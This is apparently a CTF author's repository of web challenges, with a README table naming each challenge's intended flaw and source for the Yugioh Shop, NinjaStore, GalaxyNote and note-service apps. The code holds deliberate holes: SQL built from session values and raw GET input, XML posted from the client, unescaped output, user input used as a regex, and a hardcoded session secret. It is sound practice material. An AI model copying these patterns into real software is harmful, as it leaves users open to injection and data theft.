24 | <hr />
25 | 
26 | Name | Category | Level | Idea
27 | --- | --- | --- | --- |
28 | [EnCryptBoizzz](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC%20Recruit/EnCryptBoizzz) | Web, Crypto | Medium | AES ECB -> Command Injection
29 | 
30 | ## **KCSC CTF - 2022 :golf:**
31 | <hr />
32 | 
33 | Name | Category | Level | Idea
34 | --- | --- | --- | --- |
35 | [Client-side check](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC-CTF-2022/Client-side%20check) | Web | Warm Up | Encrypt, Brute-force
36 | [Request as a service](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC-CTF-2022/Request%20as%20a%20service) | Web | Easy | SSRF, Gopher 
37 | [Leak me if you can](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC-CTF-2022/Leak%20me%20if%20you%20can/chall) | Web | Medium | XS-Leak
38 | [Create note as a service](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KCSC-CTF-2022/Create%20note%20as%20a%20service/chall) | Web | Medium | Regex injection, Time based  
39 |   
40 | ## **KMACTF 2022 - 2nd :golf:**
41 | <hr />
42 | 
43 | Name | Category | Level | Idea
44 | --- | --- | --- | --- |
45 | [inject me](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KMACTF%202022%20-%202nd/inject%20me) | Web | Medium | SQL injection
46 | [pwn me](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KMACTF%202022%20-%202nd/pwn%20me) | Web | Medium | LD_PRELOAD, RCE    
47 |   
48 | 
49 | ## **KMACTF 2022 - 3rd :golf:**
50 | <hr />
51 | 
52 | Name | Category | Level | Idea
53 | --- | --- | --- | --- |
54 | [Yugioh Shop](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KMACTF%202022%20-%203rd/Yugioh%20Shop) | Web | Medium | XXE, Phar unserialize
55 | [Your name](https://github.com/nhienit2010/My-CTF-Challenge/tree/main/KMACTF%202022%20-%203rd/Your%20Name) | Web | Medium,Hard | XSS, Recaptcha, DOM Clobbering
56 |   
57 |     
58 | > Updating...
59 | 


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require 'config.php';
 3 | 
 4 | if (!isset($_SESSION['user'])) {
 5 |     header("Location: login.php");
 6 | }
 7 | 
 8 | $data = $conn->query("SELECT * from users where username='".$_SESSION['user']."'");
 9 | $data = $data->fetch_assoc();
10 | 
11 | $utils = new Utils();
12 | 
13 | if (isset($_FILES['file'])) {
14 |     $result = $utils->uploadFile($_FILES['file']);
15 | 
16 |     if ($result[0]) {
17 |         $conn->query("UPDATE users SET avatar='".$result[2]."' WHERE username='".$_SESSION['user']."'");
18 |     }
19 | }
20 | ?>
21 | <!DOCTYPE html>
22 | <html lang="en">
23 |     <head>
24 |         <meta charset="utf-8" />
25 |         <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
26 |         <meta name="description" content="" />
27 |         <meta name="author" content="" />
28 |         <title>Yu-Gi-Oh! Shop</title>
29 |         <link href="../static/css/styles.css" rel="stylesheet" />
30 |         <link href="../static/css/shop.css" rel="stylesheet" />
31 |     </head>
32 |     <body>
33 |         <div class="container mt-5">
34 |             <div class="row d-flex justify-content-center">
35 |                 <div class="col-md-7">
36 |                     <div class="card p-3 py-4">
37 |                         <div class="text-center">
38 |                             <img src="/uploads/<?= $data['avatar'] ?>" width="100" class="rounded-circle">
39 |                         </div>
40 |                         <div class="text-center mt-3">
41 |                             <span class="bg-secondary p-1 px-4 rounded text-white">Pro</span>
42 |                             <h5 class="mt-2 mb-0"><?= $data['username'] ?></h5>
43 |                             <div class="px-4 mt-1">
44 |                                 <p class="fonts">Consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. </p>
45 |                             </div>
46 |                             <div class="buttons">
47 |                                 <button class="btn btn-outline-primary px-4">
48 |                                     <form action="profile.php" method="post" enctype="multipart/form-data">
49 |                                       <input type="file" name="file" id="file">
50 |                                       <input type="submit" value="Upload Image" name="submit">
51 |                                     </form>
52 |                                 </button>
53 |                                 <button class="btn btn-primary px-4 ms-3">Contact</button>
54 |                             </div>
55 |                             <div class="px-4 mt-1">
56 |                                 <?php if(isset($result)) echo $result[1];  ?>
57 |                             </div>
58 |                         </div>
59 |                     </div>
60 |                 </div>
61 |             </div>
62 |         </div>
63 | </body>
64 | </html>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/static/css/item.css:
--------------------------------------------------------------------------------
  1 | body {
  2 |   background-color: #eeeeee;
  3 | }
  4 | a {
  5 |   text-decoration: none !important;
  6 | }
  7 | .card-product-list,
  8 | .card-product-grid {
  9 |   margin-bottom: 0;
 10 | }
 11 | .card {
 12 |   width: 500px;
 13 |   position: relative;
 14 |   display: -webkit-box;
 15 |   display: -ms-flexbox;
 16 |   display: flex;
 17 |   -webkit-box-orient: vertical;
 18 |   -webkit-box-direction: normal;
 19 |   -ms-flex-direction: column;
 20 |   flex-direction: column;
 21 |   min-width: 0;
 22 |   word-wrap: break-word;
 23 |   background-color: #fff;
 24 |   background-clip: border-box;
 25 |   border: 1px solid rgba(0, 0, 0, 0.1);
 26 |   border-radius: 23px;
 27 |   margin-top: 50px;
 28 | }
 29 | .card-product-grid:hover {
 30 |   -webkit-box-shadow: 0 4px 15px rgba(153, 153, 153, 0.3);
 31 |   box-shadow: 0 4px 15px rgba(153, 153, 153, 0.3);
 32 |   -webkit-transition: 0.3s;
 33 |   transition: 0.3s;
 34 | }
 35 | .card-product-grid .img-wrap {
 36 |   border-radius: 0.2rem 0.2rem 0 0;
 37 |   height: 220px;
 38 | }
 39 | .card .img-wrap {
 40 |   overflow: hidden;
 41 | }
 42 | .card-lg .img-wrap {
 43 |   height: 280px;
 44 | }
 45 | .card-product-grid .img-wrap {
 46 |   border-radius: 0.2rem 0.2rem 0 0;
 47 |   height: 275px;
 48 |   padding: 16px;
 49 | }
 50 | [class*="card-product"] .img-wrap img {
 51 |   height: 100%;
 52 |   max-width: 100%;
 53 |   width: auto;
 54 |   display: inline-block;
 55 |   -o-object-fit: cover;
 56 |   object-fit: cover;
 57 | }
 58 | .img-wrap {
 59 |   text-align: center;
 60 |   display: block;
 61 | }
 62 | .card-product-grid .info-wrap {
 63 |   overflow: hidden;
 64 |   padding: 18px 20px;
 65 | }
 66 | [class*="card-product"] a.title {
 67 |   color: #212529;
 68 |   display: block;
 69 | }
 70 | .rating-stars {
 71 |   display: inline-block;
 72 |   vertical-align: middle;
 73 |   list-style: none;
 74 |   margin: 0;
 75 |   padding: 0;
 76 |   position: relative;
 77 |   white-space: nowrap;
 78 |   clear: both;
 79 | }
 80 | .rating-stars li.stars-active {
 81 |   z-index: 2;
 82 |   position: absolute;
 83 |   top: 0;
 84 |   left: 0;
 85 |   overflow: hidden;
 86 | }
 87 | .rating-stars li {
 88 |   display: block;
 89 |   text-overflow: clip;
 90 |   white-space: nowrap;
 91 |   z-index: 1;
 92 | }
 93 | .card-product-grid .bottom-wrap {
 94 |   padding: 18px;
 95 |   border-top: 1px solid #e4e4e4;
 96 | }
 97 | .bottom-wrap-payment {
 98 |   padding: 0px;
 99 |   border-top: 1px solid #e4e4e4;
100 | }
101 | .rated {
102 |   font-size: 10px;
103 |   color: #b3b4b6;
104 | }
105 | .btn {
106 |   display: inline-block;
107 |   font-weight: 600;
108 |   color: #343a40;
109 |   text-align: center;
110 |   vertical-align: middle;
111 |   -webkit-user-select: none;
112 |   -moz-user-select: none;
113 |   -ms-user-select: none;
114 |   user-select: none;
115 |   background-color: transparent;
116 |   border: 1px solid transparent;
117 |   padding: 0.45rem 0.85rem;
118 |   font-size: 1rem;
119 |   line-height: 1.5;
120 |   border-radius: 0.2rem;
121 | }
122 | .btn-primary {
123 |   color: #fff;
124 |   background-color: #3167eb;
125 |   border-color: #3167eb;
126 | }
127 | .fa {
128 |   color: #ff5722;
129 | }
130 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/profile.php:
--------------------------------------------------------------------------------
 1 | <?php require 'config.php';
 2 | 
 3 | if (empty($_SESSION['username']) || empty($_SESSION['uid']) )
 4 |     die(<<<EOF
 5 |         <meta http-equiv="refresh" content="0;url=login.php" />
 6 |     EOF);
 7 | ?>
 8 | 
 9 | <head>
10 |   <style>
11 |     body {font-family: 'Noto Sans JP', sans-serif; margin: 0; background: #f5f5f5;}
12 |     header {
13 |       background: #222; color: #fff; padding: 16px;
14 |       display: flex; justify-content: space-between; align-items: center;
15 |     }
16 |     header h1 {margin: 0; font-size: 22px;}
17 |     .nav-buttons {display: flex; gap: 10px;}
18 |     .nav-buttons a {
19 |       color: #fff; text-decoration: none; background: #444;
20 |       padding: 6px 12px; border-radius: 4px; font-size: 14px;
21 |       transition: background 0.2s;
22 |     }
23 |     .nav-buttons a:hover {background: #666;}
24 |     main {
25 |       max-width: 400px; margin: 40px auto; background: #fff;
26 |       padding: 20px; border-radius: 8px; box-shadow: 0 2px 6px rgba(0,0,0,0.1);
27 |       text-align: center;
28 |     }
29 |     .username {font-size: 22px; font-weight: 600; margin-bottom: 10px;}
30 |     .coin {font-size: 18px; color: #d9534f; font-weight: 600;}
31 |   </style>
32 | </head>
33 | <body>
34 |   <header>
35 |     <h1>Profile</h1>
36 |     <div class="nav-buttons">
37 |       <a href="index.php">Shop</a>
38 |       <a href="logout.php">Logout</a>
39 |     </div>
40 |   </header>
41 | 
42 |   <main>
43 |     <div class="username">👤 Full Name: <?php 
44 |         $fullname = $connection->query(sprintf("SELECT fullname FROM users WHERE username='%s' limit 0,1", $_SESSION["username"]));
45 |         var_dump(sprintf("SELECT fullname FROM users WHERE username='%s' limit 0,1", $_SESSION["username"]));
46 | 
47 |         if (gettype($fullname) !== "boolean") 
48 |             echo $fullname->fetch_assoc()["fullname"];
49 |         else 
50 |             echo "Anonymous";
51 |     ?></div>
52 |     <div class="coin">💰 Your coin: <?php 
53 |         $coin = $connection->query(sprintf("SELECT * FROM coins WHERE uid=%d limit 0,1", (int)$_SESSION["uid"]))->fetch_assoc()["coin"];
54 |         echo $coin;
55 |     ?>
56 |     </div>
57 |   </main>
58 | </body>
59 | </html>
60 | 
61 | 
62 | <?php
63 | 
64 | // Ran out of money?? No need to worry, you can reset carefree!! But only limited from 1-99 coins =)))
65 | if ( isset($_GET["new_balance"]) and waf($_GET["new_balance"]) ) {
66 |     $count = (int) $connection->query(sprintf("SELECT update_count FROM coins WHERE uid=%d", (int) $_SESSION['uid']))->fetch_assoc()["update_count"];
67 |     
68 |     if ($count >= 5 || strlen($_GET["new_balance"]) > 2 || preg_match('/^[a-zA-Z]+$/', $_GET["new_balance"]) )  {
69 |         die("<strong>0ops!!! Coin update has failed</strong>");
70 |     }
71 | 
72 |     $result = $connection->query(sprintf("UPDATE coins SET coin=%s,update_count=%d WHERE uid=%d", $_GET["new_balance"], $count+1, (int) $_SESSION['uid']));
73 | 
74 |         var_dump(sprintf("UPDATE coins SET coin=%s,update_count=%d WHERE uid=%d", $_GET["new_balance"], $count+1, (int) $_SESSION['uid']));
75 |     
76 |     if ($result) 
77 |         die("<strong>Your coin has been updated</strong>");
78 |     else 
79 |         die("<strong>0ops!!! Coin update has failed</strong>");
80 | 
81 | } 
82 | 
83 | ?>


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/GalaxyNote/challenge/views/create.ejs:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |   <meta charset="UTF-8">
  5 |   <title>Create Note</title>
  6 |   <style>
  7 |     body {
  8 |       background: #f5f7fa;
  9 |       font-family: Arial, sans-serif;
 10 |     }
 11 |     .container {
 12 |       max-width: 500px;
 13 |       margin: 48px auto 0 auto;
 14 |       padding: 32px 36px;
 15 |       background: #fff;
 16 |       border-radius: 12px;
 17 |       box-shadow: 0 2px 12px rgba(33,150,243,0.08);
 18 |     }
 19 |     h2 {
 20 |       text-align: center;
 21 |       margin-bottom: 24px;
 22 |       color: #2196f3;
 23 |     }
 24 |     form label {
 25 |       display: block;
 26 |       margin-bottom: 10px;
 27 |       color: #1769aa;
 28 |       font-weight: bold;
 29 |     }
 30 |     input[type="text"], textarea {
 31 |       width: 100%;
 32 |       padding: 10px 12px;
 33 |       margin-bottom: 18px;
 34 |       border: 1px solid #b3c6e0;
 35 |       border-radius: 6px;
 36 |       font-size: 16px;
 37 |       background: #f7fbff;
 38 |       resize: vertical;
 39 |     }
 40 |     textarea {
 41 |       min-height: 80px;
 42 |       max-height: 200px;
 43 |     }
 44 |     .btn {
 45 |       display: block;
 46 |       width: 100%;
 47 |       padding: 10px 0;
 48 |       background: #2196f3;
 49 |       color: #fff;
 50 |       border: none;
 51 |       border-radius: 5px;
 52 |       font-size: 17px;
 53 |       font-weight: bold;
 54 |       cursor: pointer;
 55 |       transition: background 0.2s;
 56 |     }
 57 |     .btn:hover {
 58 |       background: #1769aa;
 59 |     }
 60 |     .back-link {
 61 |       display: block;
 62 |       margin: 18px auto 0 auto;
 63 |       width: fit-content;
 64 |       color: #2196f3;
 65 |       text-decoration: none;
 66 |       font-weight: bold;
 67 |       transition: color 0.2s;
 68 |     }
 69 |     .back-link:hover {
 70 |       color: #1769aa;
 71 |       text-decoration: underline;
 72 |     }
 73 |   </style>
 74 | </head>
 75 | <body>
 76 |   <div class="container">
 77 |     <h2>Create New Note</h2>
 78 |     <form method="POST" action="/create" id="noteForm">
 79 |     <label for="title">Title</label>
 80 |     <input type="text" id="title" name="title" required />
 81 | 
 82 |     <label for="content">Content</label>
 83 |     <textarea id="content" name="content" required></textarea>
 84 | 
 85 |     <label for="created_by">Your Name</label>
 86 |     <input type="text" id="created_by" name="created_by" required />
 87 | 
 88 |     <button type="submit" class="btn">Create Note</button>
 89 |     </form>
 90 |     <a href="/" class="back-link">← Back to All Notes</a>
 91 |   </div>
 92 | </body>
 93 | </html>
 94 | 
 95 | <script>
 96 |   document.getElementById('noteForm').addEventListener('submit', async function(e) {
 97 |     e.preventDefault();
 98 |     
 99 |     const data = {
100 |       title: document.getElementById('title').value,
101 |       content: document.getElementById('content').value,
102 |       created_by: document.getElementById('created_by').value
103 |     };
104 |     
105 |     const res = await fetch('/create', {
106 |       method: 'POST',
107 |       headers: { 'Content-Type': 'application/json' },
108 |       body: JSON.stringify(data)
109 |     });
110 | 
111 |     const result = await res.json();
112 | 
113 |     if (res.ok && result.code === 200) {
114 |       alert("Tạo note thành công!");
115 |       window.location.href = "/";
116 |     } else {
117 |       alert(result.message || "Tạo note thất bại!");
118 |     }
119 | 
120 |   });
121 | </script>


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/static/css/shop.css:
--------------------------------------------------------------------------------
  1 | 
  2 | @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500&display=swap');
  3 | 
  4 | body {
  5 |     font-family: "Poppins", sans-serif;
  6 |     color: #444444;
  7 | }
  8 | 
  9 | a,
 10 | a:hover {
 11 |     text-decoration: none;
 12 |     color: inherit;
 13 | }
 14 | 
 15 | .section-products {
 16 |     padding: 80px 0 54px;
 17 | }
 18 | 
 19 | .section-products .header {
 20 |     margin-bottom: 50px;
 21 | }
 22 | 
 23 | .section-products .header h3 {
 24 |     font-size: 1rem;
 25 |     color: #fe302f;
 26 |     font-weight: 500;
 27 | }
 28 | 
 29 | .section-products .header h2 {
 30 |     font-size: 2.2rem;
 31 |     font-weight: 400;
 32 |     color: #444444; 
 33 | }
 34 | 
 35 | .section-products .single-product {
 36 |     margin-bottom: 26px;
 37 | }
 38 | 
 39 | .section-products .single-product .part-1 {
 40 |     position: relative;
 41 |     height: 290px;
 42 |     max-height: 290px;
 43 |     margin-bottom: 20px;
 44 |     overflow: hidden;
 45 | }
 46 | 
 47 | .section-products .single-product .part-1::before {
 48 |         position: absolute;
 49 |         content: "";
 50 |         top: 0;
 51 |         left: 0;
 52 |         width: 100%;
 53 |         height: 100%;
 54 |         z-index: -1;
 55 |         transition: all 0.3s;
 56 | }
 57 | 
 58 | .section-products .single-product:hover .part-1::before {
 59 |         transform: scale(1.2,1.2) rotate(5deg);
 60 | }
 61 | 
 62 | .section-products .single-product .part-1 .discount,
 63 | .section-products .single-product .part-1 .new {
 64 |     position: absolute;
 65 |     top: 15px;
 66 |     left: 20px;
 67 |     color: #ffffff;
 68 |     background-color: #fe302f;
 69 |     padding: 2px 8px;
 70 |     text-transform: uppercase;
 71 |     font-size: 0.85rem;
 72 | }
 73 | 
 74 | .section-products .single-product .part-1 .new {
 75 |     left: 0;
 76 |     background-color: #444444;
 77 | }
 78 | 
 79 | .section-products .single-product .part-1 ul {
 80 |     position: absolute;
 81 |     bottom: -41px;
 82 |     left: 20px;
 83 |     margin: 0;
 84 |     padding: 0;
 85 |     list-style: none;
 86 |     opacity: 0;
 87 |     transition: bottom 0.5s, opacity 0.5s;
 88 | }
 89 | 
 90 | .section-products .single-product:hover .part-1 ul {
 91 |     bottom: 30px;
 92 |     opacity: 1;
 93 | }
 94 | 
 95 | .section-products .single-product .part-1 ul li {
 96 |     display: inline-block;
 97 |     margin-right: 4px;
 98 | }
 99 | 
100 | .section-products .single-product .part-1 ul li a {
101 |     display: inline-block;
102 |     width: 40px;
103 |     height: 40px;
104 |     line-height: 40px;
105 |     background-color: #ffffff;
106 |     color: #444444;
107 |     text-align: center;
108 |     box-shadow: 0 2px 20px rgb(50 50 50 / 10%);
109 |     transition: color 0.2s;
110 | }
111 | 
112 | .section-products .single-product .part-1 ul li a:hover {
113 |     color: #fe302f;
114 | }
115 | 
116 | .section-products .single-product .part-2 .product-title {
117 |     font-size: 1rem;
118 | }
119 | 
120 | .section-products .single-product .part-2 h4 {
121 |     display: inline-block;
122 |     font-size: 1rem;
123 | }
124 | 
125 | .section-products .single-product .part-2 .product-old-price {
126 |     position: relative;
127 |     padding: 0 7px;
128 |     margin-right: 2px;
129 |     opacity: 0.6;
130 | }
131 | 
132 | .section-products .single-product .part-2 .product-old-price::after {
133 |     position: absolute;
134 |     content: "";
135 |     top: 50%;
136 |     left: 0;
137 |     width: 100%;
138 |     height: 1px;
139 |     background-color: #444444;
140 |     transform: translateY(-50%);
141 | }


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/item.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require 'config.php';
 3 | 
 4 | if (!isset($_SESSION['user'])) {
 5 |     header("Location: login.php");
 6 | }
 7 | 
 8 | 
 9 | if (isset($_GET["id"]) && !empty($_GET["id"])) {
10 |     $id = $conn->real_escape_string($_GET['id']);
11 | 
12 |     if (!$data = $conn->query("SELECT * FROM shop where id='$id'"))
13 |         die("No data");
14 |     $data = $data->fetch_assoc();
15 | } else {
16 |     die("No item id found!");
17 | }
18 | ?>
19 | 
20 | <!DOCTYPE html>
21 | <html lang="en">
22 |     <head>
23 |         <meta charset="utf-8" />
24 |         <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
25 |         <meta name="description" content="" />
26 |         <meta name="author" content="" />
27 |         <title>Simple Shop</title>
28 |         <link href="../static/css/styles.css" rel="stylesheet" />
29 |         <link href="../static/css/item.css" rel="stylesheet" />
30 |     </head>
31 |     <body>
32 |         <!-- Responsive navbar-->
33 |         <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
34 |             <div class="container">
35 |                 <a class="navbar-brand" href="/">Yu-Gi-Oh! Shop</a>
36 |                 <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
37 |                 <div class="collapse navbar-collapse" id="navbarSupportedContent">
38 |                     <ul class="navbar-nav ms-auto mb-2 mb-lg-0">
39 |                         <li class="nav-item"><a class="nav-link active" aria-current="page" href="/profile.php">Profile</a></li>
40 |                         <li class="nav-item"><a class="nav-link active" aria-current="page" href="/logout.php">Logout</a></li>
41 |                     </ul>
42 |                 </div>
43 |             </div>
44 |         </nav>
45 |         <div class="container d-flex justify-content-center">
46 |             <figure class="card card-product-grid card-lg"> <a href="#" class="img-wrap" data-abc="true"> <img src='<?=$data["url"]?>'> </a>
47 |             <figcaption class="info-wrap">
48 |              <div class="row">
49 |                  <div class="col-md-9 col-xs-9"> <a href="#" class="title" data-abc="true"><?=$data["name"]?></a></div>
50 |              </div>
51 |             </figcaption>
52 |             <div class="bottom-wrap-payment">
53 |              <figcaption class="info-wrap">
54 |                  <div class="row">
55 |                      <div class="col-md-9 col-xs-9"> <a href="#" class="title" data-abc="true">$<?=$data["price"]?></a></div>
56 |                  </div>
57 |              </figcaption>
58 |             </div>
59 |             <div class="bottom-wrap"> <a href="#" class="btn btn-primary float-right" data-abc="true" onclick="buy()"> Buy now </a>
60 |              <div class="price-wrap"> <a href="#" class="btn btn-warning float-left" data-abc="true"> Cancel </a> </div>
61 |             </div>
62 |             </figure>
63 |         </div>
64 |     </body>
65 | 
66 | <script type="text/javascript">
67 |     function buy() {
68 |         data = "<item><name><?=$data["name"]?></name><price><?=$data["price"]?></price></item>";
69 |         var xhr = new XMLHttpRequest();
70 |         xhr.open('POST', 'buy.php', true);
71 |         xhr.setRequestHeader('Content-type', 'text/plain');
72 |         xhr.onload = function () {};
73 |         xhr.onreadystatechange = function() {
74 |             if(xhr.readyState == 4 && xhr.status == 200) {
75 |                 alert(xhr.responseText);
76 |             }
77 |         }
78 |         xhr.send(data);
79 |     }
80 | </script>


--------------------------------------------------------------------------------
/KCSC-CTF-2022/Create note as a service/chall/challenge/index.js:
--------------------------------------------------------------------------------
  1 | var express = require('express');
  2 | var app = express();
  3 | const Database = require('./database');
  4 | const cookieParser = require("cookie-parser");
  5 | const sessions = require('express-session');
  6 | const e = require('express');
  7 | 
  8 | const database = new Database('notes.db');
  9 | var flag = ""
 10 | 
 11 | app.use(express.static('public'));
 12 | app.use(express.urlencoded({ extended: true }));
 13 | app.use(sessions({
 14 |     secret: process.env.SECRET || "thisismysecrctekeyfhrgfgrfrty84fwir767",
 15 |     saveUninitialized:true,
 16 |     resave: false
 17 | }));
 18 | app.use(cookieParser());
 19 | 
 20 | app.get('/', function (req, res) {
 21 |    res.sendFile(__dirname + '/index.html');
 22 | })
 23 | 
 24 | app.get('/login', (req, res) => {
 25 |     res.sendFile(__dirname + "/public/login.html")
 26 | })
 27 | 
 28 | app.post('/login', async (req, res) => {
 29 |     let {username, password} = req.body;
 30 |     let stmt = await database.db.prepare("SELECT * FROM users WHERE username = ? and password = ?");
 31 |     let result = await stmt.all(username, password)
 32 | 
 33 |     if (result.length > 0 ) {
 34 |         req.session.userId = result[0].id
 35 |         res.redirect('/note')
 36 |     } else {
 37 |         res.json({"Error": "User not exists"})
 38 |     }
 39 | 
 40 | })
 41 | 
 42 | app.get('/note', async(req, res) => {
 43 |     res.sendFile(__dirname + '/public/note.html')
 44 | })
 45 | 
 46 | app.post('/note', async(req, res) => {
 47 |     let userId = req.session.userId;
 48 |     let note = req.body.note;
 49 | 
 50 |     try {
 51 |         let stmt = await database.db.prepare("INSERT INTO notes(note, userId) VALUES (? , ?)");
 52 |         let result = await stmt.all(note, userId)
 53 | 
 54 |         res.json({"Success": "Your note was created"})
 55 |     } catch(e) {
 56 |         res.json({"Error": "Something went wrong"})
 57 |     }
 58 | })
 59 | 
 60 | app.get('/view', async(req, res) => {
 61 |     let id = req.query.id;
 62 |     let userId = req.session.userId;
 63 |     let stmt = await database.db.prepare("SELECT * FROM notes WHERE userId = ? and id = ?");
 64 |     let result = await stmt.all(userId, id);
 65 | 
 66 |     if (result.length > 0)
 67 |         res.send(result[0].note)
 68 |     else
 69 |         res.json({"Error": "Not found"})
 70 | })
 71 | 
 72 | app.get('/view-all', async(req, res) => {
 73 |     let userId = req.session.userId;
 74 |     let stmt = await database.db.prepare("SELECT * FROM notes WHERE userId = ?");
 75 |     let result = await stmt.all(userId);
 76 |     res.json(result)
 77 | })
 78 | 
 79 | app.get('/register', (req, res) => {
 80 |     res.sendFile(__dirname + "/public/register.html")
 81 | })
 82 | 
 83 | app.post('/register', async (req, res) => {
 84 |     let {username, password} = req.body;
 85 |     let stmt = await database.db.prepare("SELECT * FROM users WHERE username = ?");
 86 |     let result = await stmt.all(username)
 87 | 
 88 |     if (result.length == 0 ) {
 89 |         let stmt = await database.db.prepare("INSERT INTO users(username, password) VALUES (?, ?)");
 90 |         await stmt.all(username, password)
 91 |         res.json({"Success": "User was created"})
 92 |     } else {
 93 |         res.json({"Error": "User exists"})
 94 |     }
 95 | })
 96 | 
 97 | app.get("/flag", async (req, res) => {
 98 |     let user_flag = req.query.flag;
 99 |     let checkMatch = flag.match(user_flag);
100 |     // res.send(checkMatch); I think it is not necessary
101 |     res.send("Checked");
102 | })
103 | 
104 | ;(async () => {
105 |     await database.connect();
106 |     await database.init();
107 | 
108 |     let stmt = await database.db.prepare("SELECT flag FROM flag");
109 |     let result = await stmt.all()
110 |     flag = result[0].flag
111 |         
112 |     app.listen(80, '0.0.0.0', () => console.log('Listening on port 80'));
113 | })()


--------------------------------------------------------------------------------
/KMACTF 2022 - 3rd/Yugioh Shop/src/home.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | require 'config.php';
 4 | 
 5 | if (!isset($_SESSION['user'])) {
 6 | 	header("Location: login.php");
 7 | }
 8 | 
 9 | if (!$data = $conn->query("SELECT * FROM shop"))
10 | 	die("No data");
11 | ?>
12 | 
13 | <!DOCTYPE html>
14 | <html lang="en">
15 |     <head>
16 |         <meta charset="utf-8" />
17 |         <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
18 |         <meta name="description" content="" />
19 |         <meta name="author" content="" />
20 |         <title>Yu-Gi-Oh! Shop</title>
21 |         <link href="../static/css/styles.css" rel="stylesheet" />
22 |         <link href="../static/css/shop.css" rel="stylesheet" />
23 |     </head>
24 |     <body>
25 |         <!-- Responsive navbar-->
26 |         <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
27 |             <div class="container">
28 |                 <a class="navbar-brand" href="/">Yu-Gi-Oh! Shop</a>
29 |                 <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
30 |                 <div class="collapse navbar-collapse" id="navbarSupportedContent">
31 |                     <ul class="navbar-nav ms-auto mb-2 mb-lg-0">
32 |                         <li class="nav-item"><a class="nav-link active" aria-current="page" href="/profile.php">Profile</a></li>
33 |                         <li class="nav-item"><a class="nav-link active" aria-current="page" href="/logout.php">Logout</a></li>
34 |                     </ul>
35 |                 </div>
36 |             </div>
37 |         </nav>
38 |         <!-- Page content-->
39 |         <section class="section-products">
40 |             <div class="container">
41 |                 <div class="row justify-content-center text-center">
42 |                     <div class="col-md-8 col-lg-6">
43 |                         <div class="header">
44 |                             <h2>Popular Products</h2>
45 |                         </div>
46 |                     </div>
47 |                 </div>
48 |                 <div class="row">
49 |                     <?php  while($row = $data->fetch_assoc()) {?>
50 |                     <!-- Single Product -->
51 |                     <div class="col-md-6 col-lg-4 col-xl-3">
52 |                         <div id='product-<?=$row["id"]?>' class="single-product">
53 | 	                        	<style type="text/css">
54 | 								    .section-products #product-<?=$row["id"]?> .part-1::before {
55 | 								        background: url(<?=$row["url"]?>) no-repeat center;
56 | 								        background-size: contain;
57 | 								        transition: all 0.3s;
58 | 								    }
59 | 								</style>
60 |                                 <div class="part-1">
61 |                                     <ul>
62 |                                             <li><a href="#"><i class="fas fa-shopping-cart"></i></a></li>
63 |                                             <li><a href="#"><i class="fas fa-heart"></i></a></li>
64 |                                             <li><a href="#"><i class="fas fa-plus"></i></a></li>
65 |                                             <li><a href="#"><i class="fas fa-expand"></i></a></li>
66 |                                     </ul>
67 |                                 </div>
68 |                                 <div class="part-2">
69 |                                         <h3 class="product-title"><a style="color: blue;" href='/item.php?id=<?=$row["id"]?>'><?=$row["name"]?></a></h3>
70 |                                         <h4 class="product-price">$<?=$row["price"]?></h4>
71 |                                 </div>
72 |                         </div>
73 |                     </div>
74 |                     <!-- Single Product -->
75 |                     <?php } ?>
76 |                 </div>
77 |             </div>
78 |         </section>
79 | 
80 | 
81 |         <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
82 |         <script src="../static/js/scripts.js"></script>
83 |     </body>
84 | </html>
85 | 
86 | 


--------------------------------------------------------------------------------
/HDBANK Hackathon 2025/NinjaStore/challenge/src/login.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 |     require 'config.php';
 3 | 
 4 |     if (!empty($_SESSION['username']) && !empty($_SESSION['uid']) )
 5 |         header('Location: index.php');
 6 | 
 7 |     if ( $_SERVER['REQUEST_METHOD'] !== "POST" )
 8 |         die(<<<EOF
 9 |             <!doctype html>
10 |             <html lang="vi">
11 |             <head>
12 |               <meta charset="utf-8" />
13 |               <meta name="viewport" content="width=device-width,initial-scale=1" />
14 |               <title>Login</title>
15 |               <style>
16 |                 :root{--bg:#f6f8fa;--card:#fff;--accent:#2563eb;--muted:#667085}
17 |                 *{box-sizing:border-box;font-family:Inter,ui-sans-serif,system-ui,-apple-system,Segoe UI,Roboto,'Helvetica Neue',Arial}
18 |                 body{margin:0;min-height:100vh;display:flex;align-items:center;justify-content:center;background:linear-gradient(180deg,#eef2ff 0,#f6f8fa 100%)}
